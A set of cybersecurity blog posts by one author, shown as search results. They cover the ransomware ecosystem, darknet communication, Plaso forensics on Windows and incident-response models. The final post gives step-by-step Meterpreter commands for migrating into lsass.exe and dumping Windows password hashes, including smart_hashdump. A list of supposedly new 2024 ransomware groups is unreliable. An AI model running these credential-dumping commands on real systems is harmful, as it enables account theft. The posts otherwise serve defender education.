Search Results

Ransomware attacks continue to evolve, and so do the tactics used by ransomware actors. One of the key components in their operations is the infrastructure they use, often hosted on what are known as bulletproof hosting (BPH) sites. In addition to BPH, these actors also utilize virtual private servers (VPSs) and have sophisticated affiliate programs to expand their reach. What is Bulletproof Hosting (BPH)? Bulletproof hosting (BPH) providers offer hosting services without any concern for the type of content being hosted. This makes them ideal for cybercriminals, including ransomware operators, who need to host malicious infrastructure. These providers often operate in countries that have lenient privacy policies and no extradition agreements with countries like the United States. Why BPH?  Unlike regular hosting providers that respond to abuse reports, BPH providers ignore these reports, allowing illegal activities to continue. Finding BPH : These services are often advertised and purchased on darknet forums. https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021 Virtual Private Servers (VPS) In addition to BPH, ransomware actors frequently use virtual private servers (VPS) from companies like DigitalOcean and Vultr. These servers offer more flexibility and anonymity. How it works : Attackers spin up a VPS, use it for a few attacks, and then shut it down to avoid detection. This process is repeated multiple times. Identifying VPS : Sometimes, a whois lookup on an IP address used by attackers can reveal its VPS origin. For instance, Vultr uses Choopa autonomous system numbers (ASNs), which can be identified by the prefix "CHOOPA-ASN." Ransomware Affiliate Programs Ransomware groups have professionalized their operations by creating affiliate programs. These programs are similar to business partnerships where the ransomware developers and affiliates share profits from successful attacks. Evolution : Initially, these programs were informal partnerships. Today, they are structured programs managed by project managers. Rules and Marketing : Ransomware groups often provide specific rules for their affiliates and market their programs to attract skilled partners. Example: Notable Ransomware Affiliate Programs One of the well-known ransomware groups with an affiliate program is the BlackCat/ALPHV group. Their affiliate program is frequently cited as a sophisticated example of how ransomware operations are run like businesses. BlackCat/ALPHV : This group offers a well-structured affiliate program. For more detailed information, you can read Group-IB’s analysis titled “Fat Cats: An analysis of the BlackCat ransomware affiliate program” https://www.group-ib.com/blog/blackcat/ Conclusion By staying informed about these tactics and adopting strong security practices, organizations can better protect themselves against these evolving threats. Akash Patel

In my previous blog, A Deep Dive into Plaso Log2Timeline Forensic Tools, I covered how to use Plaso Log2Timeline on Ubuntu and parse the timeline . However, I understand that Ubuntu might not be feasible for everyone, so in this post, we'll discuss how to run Plaso on Windows. Note that all command parsers will be the same as in the previous blog. Blog Link :- https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools Getting Started with Docker Desktop To run Plaso/Log2Timeline on Windows, you'll need Docker Desktop. Follow these steps to get started: Download Docker Desktop : Docker Desktop Install Docker : No need to sign in. Just follow the installation prompts and configure it as you would with any other application. Installing Plaso with Docker There are two ways to install Plaso with Docker: Manual Installation : Follow the documentation. https://plaso.readthedocs.io/en/latest/sources/user/Installing-with-docker.html Docker Pull : Simply search for plaso2timeline in Docker and pull the image. Choose the method that suits you best. Testing Your Plaso Docker Image To test your Plaso Docker image, run the following command in PowerShell (ensure Docker is running with administrator privileges): (PowerShell Only) docker run log2timeline/plaso log2timeline.py --version If you get an output, it means Plaso is running successfully. Lets start-------With Main Stuff :) Collecting Artifacts The first step in analysis is to collect artifacts. I recommend using KAPE, which simplifies the process. If possible, collect data in .vhdx format. Mount the Drive : After collecting the artifacts, mount the drive. Analysis Methods Once collection done y ou can Parse/analyze the artifacts in two ways as per me : Parse all artifacts separately using Eric Zimmerman's tools , then collect all outputs into one .plaso file for analysis. This method is time-consuming but effective. Parse most artifacts with Plaso and the $MFT with Eric Zimmerman's MFTECmd tool , then merge them together. Although Plaso can parse the $MFT, I prefer using MFTECmd. Will Proceed with Second Step: 1. Parsing Artifacts with Plaso To parse all artifacts except the $MFT, use the following command in PowerShell: docker run -v E:/C:/data -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers '!mft,!usnjrnl,!filestat' --hashers md5 --status_view window --storage_file /output/akash.plaso /data Explanation : -v E:/C:/data: Maps the E:\C directory to /data  in the Docker container. (E: is drive \C folder inside drive) -v D:/Plaso:/output: Maps the D:\Plaso directory to /output in the Docker container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: The command to run inside the container. --parsers '!mft,!usnjrnl,!filestat': Excludes the MFT, USN Journal, and file statistics parsers. --hashers md5: Uses MD5 hashing. --status_view window: Sets the status view to a windowed interface. --storage_file /output/akash.plaso: Specifies the output file path inside the Docker container. /data: The source directory inside the Docker container. This command will run Plaso on the contents of E:\C and save the output to D:\Plaso\akash.plaso. 2. Parsing the $MFT with MFTECmd To parse the $MFT using MFTECmd, run the following command in CMD: MFTECmd.exe --body D:\Plaso --bodyf D:\Plaso\HOSTNAME.mft.bodyfile --bdl C -f "E:\C\$MFT" Explanation : D:\Plaso: Output directory. --bodyf: Specifies the file name in .mft.body. --bdl C: Specifies the drive letter to use with the bodyfile. -f "E:\C\$MFT": Path to the MFT file. 3. Adding MFT Data to the Plaso File Parse the MFT bodyfile and add the data to your Plaso file (in my case akash.plaso) with the following command: (PowerShell) docker run -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers 'mactime' --hashers md5 --status_view window --storage_file /output/akash.plaso /output/HOSTNAME.mft.bodyfile Explanation : docker run: Starts a Docker container. -v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: Command to run inside the container. --parsers 'mactime': Specifies the parsers to include. --hashers md5: Uses MD5 hashing. --status_view window: Sets the status view type. --storage_file /output/akash.plaso: Specifies the storage file for the timeline. /output/HOSTNAME.mft.bodyfile: Input bodyfile. You now have a final akash.plaso file that includes the MFT data as parsed by MFTECmd and all other artifacts parsed by log2timeline parser. After this you can do with this output, transfer this output into Elasticsearch or Any tool you want or you can parse it into csv format for further analysis using timeline explorer. 4. Importing the Plaso File into Elasticsearch for Timesketch To import the Plaso file into Elasticsearch for use with Timesketch, use the following command: PowerShell docker run -v D:/Plaso:/output log2timeline/plaso psort.py -o elastic --index_name example_host --server 127.0.0.1 --port 9200 /output/akash.plaso Alternatively, you can use the Timesketch importer: timesketch_importer -u [username] -p [password] --host http://127.0.0.1 --index_name HOSTNAME --sketch_name EXAMPLE --timeline_name HOSTNAME /output/akash.plaso 4.1 Exporting to CSV for Timeline Explorer You can also parse the akash.plaso file and create a CSV output for analysis with Timeline Explorer: PowerShell docker run -v D:/Plaso:/output log2timeline/plaso psort.py --output-time-zone utc -o l2tcsv -w /output/timeline.csv /output/akash.plaso Explanation : docker run: Starts a Docker container. -v D:/Plaso:/output: Mounts the D:/Plaso directory to /output inside the container. log2timeline/plaso: Specifies the Docker image. log2timeline.py: Command to run inside the container. --output-time-zone for TimeZone to include. -l2tcsv format for analysis -w /output/timeline.csv: storing the output in writeable format /output/akash.plaso: output which will be converted into csv. Additional Notes For detailed information on commands such as using a time range for analysis, parsers, and filters, refer to my previous blog. You can adjust the commands for running Plaso on Docker as needed. https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools By following these steps, you can efficiently run Plaso on Windows and perform comprehensive forensic analysis. Happy analyzing! Akash Patel

The darknet is a hidden part of the internet where anonymity is paramount. It's a favorite spot for ransomware operators and other cybercriminals to communicate and share data. Downloading Large Data Leaks Over Tor Downloading large data leaks over Tor can be challenging due to its slow speeds and the size of the files. However, there's a detailed guide that can assist you in this process. https://0ut3r.space//2022/09/30/big-files-from-tor/ Communication Channels Used by Ransomware Groups Tox : Tox is an encrypted instant messaging system that uses Tor circuits to anonymize communications. Ransomware groups like LockBit 3.0 prefer Tox for its real-time, anonymous chat capabilities. https://tox.chat/ Telegram and RocketChat : These messaging platforms are popular among ransomware operators for their encryption and ease of use. They provide a way for threat actors to communicate and coordinate their activities without revealing their identities. Darknet Forums : Darknet forums are critical hubs for ransomware communications. Some of the most popular forums include: XSS.is Exploit.in RAMP Hack Forums BreachForums CryptBB These forums are where cybercriminals share information, tools, and services. While anyone can create an anonymous account on most of these forums, it’s crucial to exercise strict operational security (OpSec) practices to avoid detection and tracking. Operational Security (OpSec) Tips When accessing darknet forums or communicating with threat actors, always adhere to OpSec principles: Use a VPN and Tor : Ensure all your online activities are anonymized through a combination of VPN and Tor. This adds layers of encryption and anonymity. Avoid Personal Information : Never use your real name, email, or any identifiable information. Be Cautious in Conversations : Be mindful of what you discuss. Criminals on these forums are often adept at analyzing behavior and communication patterns. Anonymize Your Typing Style : Even the way you type and the words you use can be traced back to you. Be consistent and avoid using distinctive language or emojis. Latest Developments in Ransomware Communications In 2024, the ransomware landscape continues to evolve. Here are some of the latest trends: Increased Use of AI : Some ransomware groups are leveraging AI to automate parts of their operations, from initial infiltration to data exfiltration. Sophisticated Phishing Campaigns : Ransomware groups are using more advanced phishing techniques to gain access to networks. These include deepfake voice phishing (vishing) and highly personalized spear-phishing emails. Ransomware-as-a-Service (RaaS) : The RaaS model is growing, with more groups offering ransomware kits to affiliates. This model allows less technically skilled criminals to launch sophisticated attacks. Double and Triple Extortion : Beyond just encrypting data, attackers now also steal and threaten to release it (double extortion). Some go further by adding DDoS attacks to the mix (triple extortion), creating multiple layers of pressure on victims. Collaboration Between Groups : There’s an increasing trend of collaboration between different ransomware groups. They share resources, intelligence, and even jointly execute attacks to maximize impact. Conclusion Navigating the darknet and understanding the communication methods of ransomware operators is crucial for cybersecurity professionals. By staying informed about the latest trends and practicing strong OpSec, you can better protect yourself and your organization from these evolving threats. Akash Patel

Ransomware attacks are a major threat today, constantly evolving to keep victims under pressure. Types of Ransomware Extortion Data Encryption : The most common form of ransomware attack involves encrypting the victim's data . This means the data and services are inaccessible until a ransom is paid. Data Extortion : Made popular by the MAZE Team, this method involves stealing (exfiltrating) data from the victim . The attackers then threaten to release this data publicly if the ransom isn't paid. This led to the creation of Data Leak Sites (DLSs) where stolen data is published. Multi-Extortion : This advanced method combines several forms of pressure. Attackers may contact the victim's suppliers, partners, regulatory bodies, or VIPs. They might also launch Distributed Denial of Service (DDoS) attacks, making it even harder for the victim to recover. Double Extortion : This is a combination of data encryption and data extortion . Attackers not only lock the victim's data but also steal it, threatening to release it if the ransom isn't paid. The MAZE Team popularized this method in 2019. Data Leak Sites (DLSs) DLSs, also known as "shaming sites," are used by ransomware groups to advertise their breaches. These sites list the stolen data and threaten to release it publicly. Organizations fear these sites because they can lead to significant business and reputational damage. The Ransom Watch site provides a group index, recent DLS posts, group profiles, and statistic/graph pages: https://ransomwatch.telemetry.ltd/#/README 2. The Ransom Look site provides a group index, forum and market links, a listing of data leaks, telegram messages, and statistic/graph pages. The team also maintains a GitHub repo that you can review: https://www.ransomlook.io/ https://github.com/RansomLook/RansomLook 3. The Ransom.Wiki site focuses more on allowing users to search for recent victims and/or ransomware groups by name: https://ransom.wiki/ 4. Dark Feed provide s several resources for identifying ransomware DLS and blog information: https://darkfeed.io/ransomwiki/ https://darkfeed.io/ransomgroups/ 5. Fastfire’s deepdarkCTI GitHub repo provides and maintains a list of ransomware group sites called “ransomware_gang.md”: https://github.com/fastfire/deepdarkCTI/blob/main/ransomware_gang.md 6. The “Ransomware Group Sites” Wiki is a .onion site and must be accessed via Tor. This site provides links to various data leak and victim portal sites: http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd[.]onion/ Conclusion Always stay updated with the latest developments in ransomware tactics to safeguard your data and services. Akash Patel

Ransomware is a constantly changing threat. It's like a game of whack-a-mole for researchers: as soon as you think you've understood one group, they rebrand or change tactics. Ransomware Groups: Names and Tactics Ransomware groups often change their names and tactics. It's like how fashion trends change, but much more dangerous. For example, a group might start as "Group A," then change to "Group B" after a few months. This makes it hard for researchers to keep track. Each group has its own tactics, techniques, and procedures (TTPs). These are like the group's signature moves. Over time, these TTPs can change, making it even harder to track them. Tracking Ransomware Groups Researchers use various methods to track these groups. One helpful resource is the "Ransomware Playbook," a Google Sheet maintained by Seongsu Park. This sheet lists the TTPs of different groups. You can check it out here . However, it’s not always straightforward. Affiliates (the people who help spread the ransomware) don't stick to one group. They might use the same TTPs for different groups, adding to the confusion. Group Evolution Over Time (2024 Update) Original Group Evolution 1 Evolution 2 Evolution 3 Evolution 4 Cerber GandCrab REvil (Sodinokibi) - - BitPaymer Doppel Paymer Grief - - Wasted Locker Hades Phoenix Macaw - MAZE Sekhmet Egregor - - DarkSide BlackMatter BlackCat/ALPHV - - Defray777 RansomEXX - - - Mount Locker Astro Locker Xing Locker - - Vasa Locker Babuk Payload.bin Groove - SynACK El_Cometa - - - Prometheus Spook - - - Nemty Nefilim Karma - - Hermes Ryuk Conti BlackBasta, Karakurt, & others - Quantum DAGON Locker - - - Chaos Yashma ONYX SolidBit - MedusaLocker Medevil - - - SunCrypt MoonCrypt - - - FiveHands EvilCorp - - - Key Changes in 2024: Phoenix  evolved into Macaw . BlackCat/ALPHV  emerged from BlackMatter . ONYX  evolved into SolidBit . Groove  emerged from Payload.bin . BlackBasta, Karakurt  continued evolving from Conti . New Ransomware Groups in 2024: Raspberry Robin : New ransomware variant targeting industrial control systems. HydraCrypt : Known for its sophisticated encryption methods and targeting financial institutions. NightSky : Focuses on healthcare and has caused significant disruptions in hospitals. PolarBear : Targeting cloud infrastructure with advanced evasion techniques. SilverStorm : Primarily targets government entities and critical infrastructure. Top Five Industries Hit in 2024: Healthcare Financial Services Manufacturing Education Government Top Five Active Ransomware Groups in 2024: BlackCat/ALPHV : Continues to evolve with new tactics and significant impact. BlackBasta : Increased activity targeting a variety of sectors. Conti : Despite setbacks, remains active with new offshoots like Karakurt. Raspberry Robin : New but highly disruptive, especially in industrial sectors. SilverStorm : Notable for targeting critical infrastructure with advanced methods. Few more known ransomware groups as per 2024: Akash Patel

Introduction Welcome back to our series on Ransomware-as-a-Service (RaaS)! In this post, we will explore RaaS dashboards and the role of darknet marketplaces in facilitating ransomware attacks. Understanding these components will give you a deeper insight into how ransomware operations are managed and executed. Let’s dive in! RaaS Dashboards: A Command Center for Cybercriminals RaaS dashboards provide affiliates with an overview of their ransomware activities. These dashboards are packed with features that help affiliates monitor and manage their attacks effectively. Here’s what you can typically find on a RaaS dashboard: Key Features of RaaS Dashboards Deployment Effectiveness:  Affiliates can track how well their ransomware is spreading. Statistical Analysis:  Dashboards display statistics by country, operating system, and more. Communication Tools:  Some dashboards allow direct communication with victims for negotiation purposes and many more.. Darknet Marketplaces: Buying and Selling Access Initial Access Brokers (IABs) and other cybercriminals use darknet marketplaces to trade access to victim networks and stolen data. Let’s take a closer look at how these transactions work. Key Marketplaces Odin:  Focuses on selling remote access to victim networks. Marketo:  Specializes in selling and auctioning stolen data. These marketplaces have evolved to be more anonymous. Initially, they provided detailed information about the victim organizations, but researchers began scraping this data and notifying potential victims. Now, the details are more generic, often including only the top-level domain, hosting provider, operating country, and access type. Buying and Selling Access Marketplaces are filled with forum posts where actors buy and sell access. For example: Sellers:  Offer access to various organizations, including corporations, institutions, and even governments. Access types include RDP, VNC, cPanel, SSH, and more. Buyers:  Seek access to organizations, primarily in the US, EU, and UK. Some buyers avoid targeting hospitals, governments, and educational institutions. To avoid scams, many forums offer escrow services, ensuring that payments are held until both parties fulfill their part of the deal. Some forums even have dispute resolution systems similar to courts to handle disagreements between users. Zero-Day Exploits and Social Engineering The threats posed by RaaS operations extend beyond selling access and ransomware. Let’s look at some concerning trends. Zero-Day Exploits IABs sometimes offer zero-day exploits, which are vulnerabilities that have not been disclosed or patched. These exploits can provide remote code execution capabilities, making them highly valuable to ransomware groups. Social Engineering Cybercriminals also use social engineering tactics to trick employees into installing ransomware within their company's network. For example, an email might offer a share of the ransom payment in exchange for helping to deploy the ransomware. LockBit, a notorious ransomware group, has been known to use this method. Proofpoint's 2022 Social Engineering report highlights such tactics, demonstrating the ongoing threat of social engineering in ransomware attacks. Conclusion Understanding the intricacies of RaaS dashboards and darknet marketplaces is crucial in grasping the full scope of ransomware operations. In our next post, we’ll continue to explore the complex world of RaaS, focusing on how these operations impact organizations and what steps can be taken to mitigate these threats. Stay informed, stay vigilant, and stay safe. Akash Patel

Introduction Welcome back to our series on Ransomware-as-a-Service (RaaS)!Today, we’re diving into the world of ransomware builders, the tools that allow ransomware to be customized and deployed efficiently. The Chaos Ransomware Builder Ransomware builders are tools that enable cybercriminals to create customized ransomware payloads. One of the notable examples is the Chaos Ransomware Builder. Main Menu Customization Options The main menu of the Chaos Ransomware Builder offers several customization options for creating ransomware payloads: Ransom Note Contents:  Customizing the text of the ransom note that victims see. Ransom Note Filename:  Setting the filename for the ransom note. Encrypted File Extension:  Changing the extension of encrypted files (default is to randomize). USB and Network Spreading:  Enabling the ransomware to spread via USB drives and network shares. Payload Process Name:  Customizing the process name of the ransomware. File Extensions to Target:  Specifying which file types to encrypt. Delay Prior to Encryption:  Setting a delay before the encryption process starts. Startup Persistence Options:  Ensuring the ransomware runs on system startup. Custom Executable Icon:  Changing the icon of the ransomware executable. Advanced Options The Advanced Options section of the Chaos builder provides additional features for more sophisticated attacks: Recovery Tampering Features: Deleting Volume Shadow Copies Deleting the Windows Backup Catalog Disabling Windows Recovery Disabling the Task Manager Custom Wallpaper:  Setting a custom wallpaper after encryption. Creating a Decryptor:  Generating a decryptor for the created ransomware payload. Examples of Ransomware Builders Leaked and Modified Builders On various darknet forums, you can find screenshots of different ransomware builders. For instance: Babuk Ransomware Builder:  Leaked on RAID Forums (now known as Breached.to ), allowing others to use or modify it.(Website have been ceased by US government) Ryuk Builder:  Modified versions are often sold, providing customized features for affiliates. These builders, whether leaked or sold, highlight the ease with which ransomware can be distributed and customized. OS-Specific Payloads Some builders are capable of creating payloads for different operating systems, such as Linux and ESXi. This capability allows ransomware to target a wide range of environments. For example, ESXi payloads can encrypt all virtual machine (VM) files within an ESX cluster, potentially crippling entire networks. The Impact of Ransomware Builders The availability and customization options of ransomware builders significantly lower the barrier to entry for cybercriminals. With tools like the Chaos Ransomware Builder, even less technically skilled attackers can create and deploy ransomware effectively. This democratization of ransomware development has led to an increase in ransomware attacks, making it a pervasive threat in the cybersecurity landscape. Conclusion These tools enable the creation of customized and sophisticated ransomware, making it easier for attackers to launch effective attacks. In our next post, we’ll explore the RaaS dashboard, RaaS marketplaces, and the process of selling access. Stay tuned as we continue to unravel the complexities of RaaS and its impact on cybersecurity. Akash Patel

Welcome back to our series on Ransomware-as-a-Service (RaaS)!. Today, we’re going to dig deeper into two key components: Initial Access Brokers (IABs) and Ransomware Builders. These elements are crucial to understanding how modern ransomware attacks are carried out. The Role of Initial Access Brokers (IABs) Initial Access Brokers (IABs) are like the front door openers for ransomware attacks. Their job is to get into victim networks and then sell that access to ransomware operators. Here’s how they do it: How IABs Get Access Targeting: Some IABs attack any vulnerable system they can find (opportunistic). Others aim at specific industries or organizations to maximize their impact (targeted). Tools and Tricks: Vulnerability Search Engines:  Websites like Shodan  and Censys  help IABs find weaknesses in systems connected to the internet. MASSCAN:  This tool can scan all the IP addresses in the world in under five minutes, helping IABs quickly find targets. Learn more about MASSCAN here . Dark Web Markets:  IABs buy and sell access to compromised networks on these underground sites. What IABs Do IABs handle the tricky parts of getting into a network, such as: Phishing Attacks:  Sending fake emails to trick people into giving up their login details. Bypassing MFA:  Finding ways around multi-factor authentication to get into systems. Brute-Forcing Passwords:  Trying many passwords quickly to guess the right one. Scanning for Weaknesses:  Constantly looking for vulnerable devices to exploit. Ransomware Builders Ransomware builders are tools that create customized ransomware payloads. Think of them as the factory where the ransomware is made to order for each attack. How Ransomware Builders Work Customization: Data Leak Site (DLS) URLs:  Setting up where stolen data will be published. Email Addresses:  Embedding contact details for ransom negotiations. Encryption Keys:  Generating unique keys for each attack. Creating Payloads: Developers use these builders to create custom ransomware for each affiliate. Each version is unique and tailored to ensure the right person gets credit for the attack. Builders also embed specific public keys and custom ransom notes into the payloads, making each one different. Handling Ransomware Payloads If you find a ransomware payload on your network, be very careful with it. Uploading it to a malware analysis site like VirusTotal can expose victim-specific information, such as: Private Chat Links:  Access to communication between you and the ransomware operators. Data Leak Sites:  Information about where your stolen data might be published. Always handle ransomware samples cautiously to avoid making things worse. Conclusion By understanding the roles of Initial Access Brokers and Ransomware Builders, we get a clearer picture of how organized and sophisticated ransomware attacks have become. In our next post, we’ll explore more about ransomware builders, including some of the most infamous examples. Stay tuned as we continue to uncover the world of RaaS and how it impacts cybersecurity. Akash Patel

In our previous blog, we delved into the history and evolution of ransomware, from the AIDS Trojan to modern-day threats. Today, we turn our focus to a revolutionary concept that has significantly altered the ransomware landscape: Ransomware-as-a-Service (RaaS). This model has transformed ransomware operations into a streamlined, profit-driven industry. The Advent of Ransomware-as-a-Service (RaaS) Ransomware-as-a-Service, commonly known as RaaS, has revolutionized the cybercrime ecosystem. It provides a turn-key solution for ransomware operations, making it accessible even to those with limited technical expertise. How RaaS Works The general theory of the RaaS model is straightforward: Development:  A developer or a group of developers creates a ransomware payload. They might also develop a "builder," which can generate customized payloads on demand. Subscription:  The ransomware is offered through a subscription-based program, effectively leasing it out to third parties. Affiliates:  Those who lease the ransomware, known as affiliates, are responsible for deploying it within as many organizations as possible. Profit Sharing:  The profits from successful attacks are typically split between the developer and the affiliate, with a common split being 30% to the developer and 70% to the affiliate. Roles in the RaaS Business Model The RaaS ecosystem is structured with several specialized roles, each playing a crucial part in the success of ransomware campaigns: Initial Access Brokers (IABs): Role:  IABs are responsible for gaining initial access to victim networks. They sometimes market themselves as "pentesters" to lend a sense of legitimacy to their work. Method:  They may exploit vulnerabilities, use phishing attacks, or purchase access credentials to infiltrate networks. Affiliates: Role:  Affiliates use the access provided by IABs to deploy ransomware within victim environments. Function:  Their core tasks include exfiltrating data and deploying the ransomware payload. Data Managers: Role:  These individuals handle and sort exfiltrated data. Purpose:  They identify and archive the most valuable information to use for extortion purposes. Operators: Role:  The development crew behind the scenes. Function:  They develop and maintain the encryption payloads and associated infrastructure. Negotiators: Role:  Negotiators handle ransom payment discussions. Advice:  It's crucial to be cautious when engaging with negotiators directly, as they are skilled in maximizing payouts. Chasers: Role:  These individuals apply psychological pressure on victims to pay the ransom. Methods:  They may contact victims via phone or email, reach out to their business partners, or use other means to increase the urgency and stress of the situation. Accountants: Role:  Accountants are responsible for money laundering and handling ransom payments. Function:  They ensure that payments are "cleaned" and can be used without detection, often holding payments for days or weeks before processing them. Conclusion The RaaS model has made ransomware attacks more organized and efficient, creating a thriving underground economy. In the next few blogs, we will delve deeper into each of these roles, examining how they contribute to the overall ransomware operation and discussing strategies for defense and mitigation. Stay tuned as we uncover more about the dark world of ransomware and the ongoing battle to protect our digital landscapes. Akash Patel

Introduction Everyone knows what ransomware is and what it does, but only a few are aware of its origins and history. Over the next few blogs, we'll dive deep into the fascinating journey of ransomware, its transformation over the years, and the RAAS (Ransomware as a Service) model. The Real Definition of Ransomware Many people still use the term "ransomware" to refer to what we should rather describe as an "encryptor payload." We need people to understand that a ransomware payload is the portable executable (PE), typically a Windows executable (.exe file) or a Dynamically Linked Library (DLL) file, that performs the actual encryption process. But, as we know, a ransomware attack spans an entire attack campaign and has become its own realm of the overall cybercrime ecosystem. The Evolution of Ransomware Payloads Ransomware payloads have gone through various format changes over time: Lockers:  Initially, we had "lockers," which essentially locked the machine from being used. Some of them were simple and bypassable, relying merely on Microsoft’s BlockInput API function. Disk Encryptors:  Next came the "disk encryptors," which would encrypt an entire disk, thus preventing the disk from being mounted. File Encryptors:  Eventually, the move was made to file encryptors, often referred to as "cryptor payloads" today. On darknet forums, especially those frequented by Russian-speaking actors, cryptor payloads are still often referred to by the old term "lockers." The Payment Evolution The first phase of lockers typically relied on gift cards and vouchers for payment. The purchase of these cards could be anonymous, and the numbers provided with them could be sent to threat actors easily. Eventually, ransomware operators moved to requesting cryptocurrency, which is the norm today. The First Known Ransomware: The AIDS Trojan The first known ransomware was the “AIDS Trojan,” also referred to as the “PC Cyborg Trojan.” Authored by Joseph Popp, this ransomware was distributed in 1989 via infected floppy disks labeled “AIDS Information - Introductory Diskettes” handed out to attendees of the World Health Organization’s AIDS conference. Once installed, the software would wait a given number of computer boots before locking down the computer. Fully Automated Ransomware (FAR) Following the AIDS Trojan, ransomware families became what we now call fully automated ransomware (FAR). These ransomware families were automated and did not require human intervention to carry out their attacks. "FakeAV" lockers became commonplace. These payloads resembled antivirus solutions, yet when a user interacted with them, they would lock down the computer, demand payment, and require calling a “support” number to fix the issue. The Rise of Crypto-* Payloads Eventually, the Crypto-* named payloads became commonplace. CryptoLocker and CryptoWall, which first hit the scene in 2013, were historically spread via email attachments. When users would open the attachments, the payloads would lock down the computer, demanding payment. This phase gave way to the proliferation of gift card payment requests. Human-Operated Ransomware (HumOR) In mid-2020, Microsoft coined the term “human-operated ransomware” (HumOR). Unlike automated ransomware, HumOR attacks are driven by humans rather than auto-propagation methods. Human actors with "hands on their keyboards" carry out the attacks, often resembling advanced persistent threat (APT) campaigns. These attacks are more adaptable and can inflict significant damage before deploying the ransomware payload. Conclusion Ransomware has evolved significantly from its origins with the AIDS Trojan to the sophisticated human-operated campaigns we see today. Understanding its history and evolution helps us better prepare for and defend against these threats. Stay tuned for our next blog, where we'll explore the RAAS model and its impact on the cybersecurity landscape. Akash Patel

Incident Response (IR) is a critical component in the cybersecurity landscape, often abbreviated as PICERL, which stands for Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. However, while this framework is theoretically sound, many organizations struggle with its execution. The Limitations of PICERL Preparation Preparation is foundational, but many organizations fail at basic security measures, often referred to as "Security 101" practices. Common failures include: Poor implementation of least privilege principles and strong passwords. Lack of network monitoring and log aggregation. Insufficient threat intelligence utilization. Identification A major issue in identification is organizations often limit their focus to known compromised systems, neglecting to scan the entire network for other potential threats. Containment Containment is frequently skipped or poorly executed. Killing attacker processes without collecting vital evidence can hinder a thorough understanding of the incident. Improper scoping leads to incomplete containment and allowing threat actors to persist in the environment. Eradication Incomplete eradication is a common issue. Without a comprehensive investigation, multiple footholds left by threat actors may go unnoticed. For instance, if a threat actor uses a VPN to gain access and installs remote access tools across several hosts, failing to identify all points of compromise can lead to re-infection. Recovery Recovery tends to be more thorough as business operations are directly impacted. Lessons Learned During the lessons learned phase, organizations often fail to identify and fix all root causes. For example,  if weak RDP credentials led to an incident, it's crucial to understand why such weaknesses were allowed and address the underlying policy and enforcement issues to prevent recurrence. Why We Need a Dynamic Approach The static, linear nature of PICERL is one of its biggest limitations. Incident response is not a one-size-fits-all process. Multiple events can occur simultaneously, and a rigid approach can lead to oversights. This calls for a more flexible and dynamic approach, like the DAIR model. Introducing the DAIR Model The Dynamic Approach to Incident Response (DAIR) shifts from a linear to a more fluid and outcome-focused model. Instead of viewing incident response as a series of steps, DAIR breaks it down into waypoints, outcomes, and activities. Waypoints and Activities Preparation, Detection, Verification, and Triage : Detection is an ongoing activity, and verifying an incident is just one part of the process. Detection to Verification and Triage : Once an incident is detected, the next step is to verify and perform initial triage. Initial actions, differing significantly depending on the type of incident (e.g., ransomware vs. internal threats). Ongoing Activities : Incident response is continuous. Activities such as data collection, system hunting, and vigilance are ongoing to achieve desired outcomes. Scoping, for instance, involves identifying compromised systems through evidence collection and network scanning. Outcomes Scoping : Identifying compromised systems, which might require various activities like evidence collection and network scanning. Containment : Ensuring the threat is confined to prevent further spread. Eradication : Removing the threat completely from the environment. Recovery : Restoring business operations to normal. Remediation : Addressing root causes to prevent recurrence. Practical Steps to Apply DAIR Prepare : Establish robust security practices and ensure network monitoring and threat intelligence are in place. Detect : Implement continuous monitoring to detect incidents promptly. Verify and Triage : Quickly verify detected incidents and perform initial triage to guide response efforts. Scope, Contain, Eradicate, Recover, and Remediate : Follow response steps while continuously communicating with decision-makers. Learn and Improve : Analyze each incident to identify root causes and improve security measures to prevent future incidents. Conclusion Transitioning from PICERL to DAIR offers a more dynamic and adaptable incident response model. By focusing on waypoints, outcomes, and continuous activities, organizations can better manage the complexities of modern cybersecurity threats. Incident response is an ongoing process, and vigilance is key to maintaining a secure environment. Akash Patel

Gaining access to local password hashes on a Windows 10 system can be crucial for attackers. Two main methods are discussed here: using the Meterpreter hashdump command and leveraging the Metasploit smart_hashdump module. Method 1: Using Meterpreter hashdump Step-by-Step Process: Initial Attempt to Dump Hashes: meterpreter > hashdump This command often fails due to modern protections in Windows: [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. 2. Identify lsass.exe Process: meterpreter > ps -S lsass.exe 3. Migrate to lsass.exe: meterpreter > migrate 620 [*] Migrating from 1248 to 620 ... [*] Migration completed successfully. 4. Dump Hashes After Migration: meterpreter > hashdump Note:  If migration fails, you may need to try migrating to another SYSTEM process first before migrating to lsass.exe. Method 2: Using Metasploit smart_hashdump Module Step-by-Step Process: Identify a SYSTEM Process: meterpreter > ps -A x64 -a Choose a SYSTEM process (avoid svchost.exe). 2. Migrate to Chosen Process: meterpreter > migrate 1404 [*] Migrating from 448 to 1404 ... [*] Migration completed successfully. 3. Run smart_hashdump: meterpreter > run post/windows/gather/smart_hashdump Successful output saves the hashes to a file: Advantages of smart_hashdump: Attempts to retrieve both local and domain account password hashes if the target is a domain controller. Bypasses some of the limitations of directly dumping from lsass.exe. Conclusion Using tools like Meterpreter's hashdump and Metasploit's smart_hashdump module, attackers can effectively extract password hashes from Windows 10 systems We will continue in next blog........................................................... Akash Patel